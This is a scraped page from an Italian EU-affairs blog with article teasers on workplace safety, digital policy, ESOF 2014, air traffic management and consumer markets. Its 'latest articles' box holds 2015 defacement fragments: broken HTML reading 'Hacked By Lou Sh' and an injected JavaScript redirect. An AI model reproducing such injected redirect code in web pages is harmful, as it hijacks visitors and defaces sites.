EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Luglio 2014
it

Investire in una cultura della prevenzione dei rischi, garantendo condizioni migliori sul posto di lavoro, può offrire vantaggi non soltanto sociali ma anche economici, specie in una situazione di crisi come quella odierna. Per questo la Commissione europea ha presentato a Bruxelles un nuovo quadro strategico in materia di salute e sicurezza sul lavoro, con la speranza di bissare i risultati positivi ottenuti nel periodo 2007-2012.

Ogni anno sono più di 3 milioni i lavoratori europei vittime di gravi infortuni sul lavoro, 4 mila dei quali mortali. Infortuni che, insieme alle malattie professionali, colpiscono - come ha ricordato László Andor , Commissario europeo per l’Occupazione, gli affari sociali e l’inclusione - “tutti i (...)

it

Secondo i dati acquisiti dal quadro di valutazione del 2013, la strada intrapresa dall’Unione europea in materia di alfabetizzazione digitale sembra essere quella giusta. All’interno dei paesi membri sono stati compiuti molti passi avanti nell’ambito delle telecomunicazioni e delle nuove tecnologie ed è cresciuto il numero di cittadini e imprese che utilizzano quotidianamente strumenti digitali, usufruendo delle grandi potenzialità del collegamento in rete. Permangono, però, problemi che non permettono la diffusione capillare delle nuove tecnologie informatiche; l’Unione europea deve continuare a lavorare per risolvere queste criticità e raggiungere gli obiettivi individuati all’interno della strategia Europa 2020.

La necessità a cui deve far fronte l’Unione europea è quella di creare un mercato unico delle telecomunicazioni, in un mondo sempre più proiettato nell’universo telematico e digitale. Risulta evidente, infatti, la mancanza di un ambiente digitale unitario, competitivo e capace di creare nuovi posti (...)

it

Si è concluso lo scorso 26 giugno l’Euroscience Open Forum (ESOF) 2014, iniziativa scientifica biennale europea, ospitata quest’anno dalla città di Copenaghen e organizzata in collaborazione con l'EuroScience Association.

Che cos’è ESOF? E’ il più grande meeting europeo nel settore scientifico che riunisce ricercatori, imprenditori, innovatori, responsabili politici ed il pubblico di tutta Europa per portare avanti il dibattito sulle scoperte scientifiche e le aspettative per il futuro. Il presidente della (...)

it

Lo scorso 1 luglio la Commissione europea ha varato una prima parte di modifiche importanti per aggiornare il “Progetto pilota comune”, il sistema europeo di trasporto aereo (ATM- Air Traffic Management).

La SESAR, Single European Sky ATM Research, è promotrice di questo programma che non è l’unico in gioco ma fa parte di una serie di progetti molto più ampi. L’obiettivo della SESAR è quello di poter migliorare il trasporto aereo per i cieli europei attraverso la modernizzazione degli scambi da e per (...)

it

Attraverso uno studio del quadro di valutazione dei mercati per i beni di consumo del 2014, sono stati considerati in maniera particolare quattro elementi: comparazione delle offerte, fiducia nelle imprese, problemi, reclami e soddisfazione per le imprese. Lo studio portato avanti dalla Commissione europea segue le prestazioni di ben 52 mercati di consumo che vanno da autoveicoli di seconda mano fino alle residenze per le vacanze.

Cosa si evince dallo studio? Per prima cosa un netto miglioramento per quello che riguarda le prestazioni di mercato: infatti, tra il 2012 e il 2013 il valore globale dei mercati in tutti i paesi è migliorato. Ovviamente bisogna tener conto delle differenza a livello di mercato che esistono tra (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France